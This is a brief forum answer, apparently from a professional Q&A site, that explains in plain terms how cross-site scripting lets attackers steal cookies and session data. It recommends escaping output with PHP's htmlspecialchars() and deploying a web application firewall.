Register now or log in to join your professional community.
The idea of xss is that a hacker can inject their own custom JavaScript into a webpage. It's used to trick users into running their custom JavaScript code. And they also used to steal cookies. And if they steal cookies they can steal the cookies data as well as potentially session data, which has been linked with a cookie.
The main way is sanitizing any dynamic text that gets output to the browser. Make sure that it's safe. Turn it into something that's harmless before you put it on the page. So that means your HTML, your JavaScript, JSON, XML, anything else that you output. You want to make sure that it gets rendered harmless, especially data that comes from URL or forms.
Use the htmlspecialchars( ) function to convert the predefined characters "<" (less than) and ">" (greater than) to HTML entities so any script tag rendered harmless .
You can deploy as web application firewall to secure your web services